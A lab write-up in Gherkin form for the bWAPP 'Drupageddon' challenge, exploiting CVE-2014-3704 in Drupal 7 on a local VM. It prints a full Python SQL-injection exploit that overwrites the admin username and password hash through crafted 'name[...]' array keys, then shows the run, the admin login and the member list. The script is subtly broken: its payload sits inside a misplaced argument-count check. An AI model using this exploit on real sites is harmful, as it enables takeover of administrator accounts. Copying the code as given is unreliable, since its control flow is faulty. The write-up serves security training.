# language: en

Feature: SQL Injection - Drupal
  From system bWAPP
  From the A1 - Injection Category
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following
  """
  URL: http://localhost/bWAPP/sqli_drupal.php
  Message: SQL Injection - Drupageddon
  Details:
        - The Drupal version is vulnerable to SQL injection! (bee-box only)
        - Hint: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
  Objective: Perform a SQL injection on a vulnerable drupal version
  """

Scenario: Druppagedon!
The expandArguments function in the database abstraction API in Drupal core 7.x
before 7.32 does not properly construct prepared statements, which allows
remote attackers to conduct SQL injection attacks via an array containing
crafted keys. This SQL injection is most of the type of updating the
username and password.
  Given the url of the drupal site
  """
  # Drupal Site IP
  # http://192.168.56.101/drupal/
  """
  Then I take a look at the CVE-2014-3704
  And I see there is a exploit link
  And an explanatation, which I stated before
  But before executing the exploit I inspect the site a little bit
  """
  # drupal.php
  # Login Form HTML source code
  <div class="content">
  <form action="/drupal/?q=node&amp;destination=node" method="post"\
  id="user-login-form" accept-charset="UTF-8"><div><div class="form-item\
  form-type-textfield form-item-name">

  # Username input text
  <label for="edit-name">Username <span class="form-required"\
  title="This field is required.">*</span></label>
  <input type="text" id="edit-name" name="name" value=""\
  size="15" maxlength="60" class="form-text required" />
         </div>
         <div class="form-item form-type-password form-item-pass">

  # Password input text
  <label for="edit-pass">Password <span class="form-required" \
  title="This field is required.">*</span></label>
  <input type="password" id="edit-pass" name="pass"\
  size="15" maxlength="128" class="form-text required" />

  # Let's check the request it creates using Burp
  # At first sigth there can be seen two parameteres in URL
  # Where q/destination seems to be links pointing to some specific url
  # inside the domain's project.
  # Not the target of the exploit.
  POST /drupal/?q=node&destination=node HTTP/1.1
  Host: 192.168.56.101
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://192.168.56.101/drupal/?q=node&destination=node
  Cookie: security_level=0; PHPSESSID=039c3ad5c89520400db823599bd681af; has_js=1
  Connection: close
  Upgrade-Insecure-Requests: 1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 109

  name=&pass=&form_build_id=form-w7tigrq70wXNd7EuTYXh0aZG_VEmzqiCE2vM3pSb-EY\
  &form_id=user_login_block&op=Log+in
  # Here it is, the POST vulnerable parameters used to exploit Drupal
  # with a Sql Injection. It occurs when the parameter name, fails to validate
  # input data, injecting something like: name[0%20;] works! as it
  # is not being validated there can be a query construction on it.
  """
  Then I look for more info on the exploit on the CVE
  And I see there is a exploit on exploit-db
  """
  # Exploit-db 34984
  https://www.exploit-db.com/exploits/34984/
  """
  Then I check the source code
  And  I try to understand it first
  """
  # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/\
  # SA-CORE-2014-005
  # Creditz to https://www.reddit.com/user/fyukyuk
  # EDB Note ~ Updated version:
  # https://github.com/kenorb/drupageddon/blob/master/drupal_7.x_sql_injection\
  # _sa-core-2014-005.py
  import urllib2,sys
  from drupalpass import DrupalHash
  # That module can be downloaded from here:
  # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/\
  # drupalpass.py
  #
  # When executing the script, send 3 arguments:
  # - Target Host
  # - Username to update password
  # - Password which will replace the old one
  host = sys.argv[1]
  user = sys.argv[2]
  password = sys.argv[3]
  if len(sys.argv) != 3:
      print "host username password"
      print "http://nope.io admin wowsecure"
      #  To be able to store it, the password must be hashed, that's why
      #  the drupalpass is needed, it only requieres hashlib to work
      #  but it needts to perform other steps on creation.
      hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K\
      5TzKzML", password).get_hash()
      # URL parameters remain unchanged, they won't work for the exploit
      target = '%s/?q=node&destination=node' % host
      #
      # Rigth here, on the POST parameters it's where the magic occurs.
      # Injection takes place on the "name" parameter, by treating it like
      # what it is, a string ("I suppose"), trying to get whatever it is in
      # position [0], then taking advantage of non validation, by crafting
      # a query inside of it.
      # The query starts by updating the name of the user, to the one choosen
      # before, the password is concatenated too, then the hash generated,
      # all in name[0%20; ... ;;#] To end with comments to invalidate code
      # next to it.
      post_data = "name[0%20;update+users+set+name%3d\'" \
                  +user \
                  +"'+,+pass+%3d+'" \
                  +hash[:55] \
                  +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=\
                  lol&form_build_id=&form_id=user_login_block&op=Log+in"
      # Send the new POST data to the target
      content = urllib2.urlopen(url=target, data=post_data).read()

      # Lastly, find in content an specific error thrown by the CMS, which
      # it is the indication the exploit worked.
      if "mb_strlen() expects parameter 1" in content:
              print "Success!\nLogin now with user:%s and pass:%s" % \
              (user, password)
  """
  And now that I understand how it works, I execute it
  """
  # Druppagedon.py
  skhorn@Morgul ~/D/p/challs> ./druppageddon.py http://192.168.56.101/drupal \
  admin wowsecure
  # Output
  host username password
  http://192.168.56.101/drupal admin wowsecure

  # Let's look at one portion of the response
  <li><em class="placeholder">Warning</em>: mb_strlen() expects parameter 1 to\
  be string, array given in <em class="placeholder">drupal_strlen()</em>\
  (line <em class="placeholder">478</em> of <em class="placeholder">/var/\
  www/drupal/includes/unicode.inc</em>).</li> =========>

  # It seems it work!
  """
  Then I use the newly provided credentials
  """
  # Credenitals:
  # -  Username: admin
  # - Password: wowsecure
  """
  And I get to log in
  """
  ul id="toolbar-user"><li class="account first">\
  <a href="/drupal/?q=user" title="User account">Hello <strong>admin\
  </strong></a></li>

  # Overthere, I can access every single part of drupal, I can manage everything
  # of it, including members:
  #
  | USERNAME | STATUS | ROLES | MEMBER FOR | LAST ACCESS | OPERATIONS |
  | :---: | :---: | :---: | :---: | :---: |
  | admin | active | administrator | 3y 8M 2m 46s ago | edit |
  | zpPyGvvZJQ |active | administrator | 48y 6m | 3y 8m ago | edit |
  | WwSLXBisYg | active | administrator | 48y 6m | 3y 8m ago | edit |
  | ESkLHfVmgQ | active | administrator | 48y 6m | 3y  8m ago | edit |
  | DgxYAlzpHV | active | administrator | 48y 6m | 3y 8m ago | edit |
  | YqvZxrbTap | active | administrator | 48y 6m | 3y 8m ago | edit |
  | cPtDOlQPQI | active | administrator | 48y 6m| 3y 8m ago | edit |
  | NoisZFqBPT | active | administrator | 48y 6m | 3y 8m ago | edit |
  """
